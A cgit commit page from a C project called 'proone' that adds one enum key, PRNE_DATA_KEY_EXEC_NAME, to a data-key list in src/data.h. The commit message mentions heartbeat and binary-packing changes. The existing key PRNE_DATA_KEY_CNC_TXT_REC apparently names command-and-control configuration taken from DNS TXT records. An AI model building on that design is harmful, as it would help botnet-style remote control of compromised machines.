aboutsummaryrefslogtreecommitdiff
path: root/src/data.h
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-09-08 16:18:13 +0930
committerDavid Timber <mieabby@gmail.com>2020-09-08 16:18:13 +0930
commit550d2eec27a42254b26139208765022fffe7c775 (patch)
tree3842addbbded988183405d37b9cc9c451ba919d9 /src/data.h
parent8eed8cde29960ace2ea1b2ceb61962be6f258364 (diff)
* Remove proone-unpack
* self test is done by proone-pack * Impl: htbt@proone * htbt: allocate large buffer first by deault * htbt: use 0600 for NY_BIN as the image is not an executable * pack: return error when z_stream is cut short * proone-pack: impl "nybin" file format
Diffstat (limited to 'src/data.h')
-rw-r--r--src/data.h1
1 files changed, 1 insertions, 0 deletions
diff --git a/src/data.h b/src/data.h
index cff783b..f2b6d92 100644
--- a/src/data.h
+++ b/src/data.h
@@ -16,6 +16,7 @@ typedef enum {
PRNE_DATA_KEY_RESOLV_NS_IPV4,
PRNE_DATA_KEY_RESOLV_NS_IPV6,
PRNE_DATA_KEY_CNC_TXT_REC,
+ PRNE_DATA_KEY_EXEC_NAME,
NB_PRNE_DATA_KEY
} prne_data_key_t;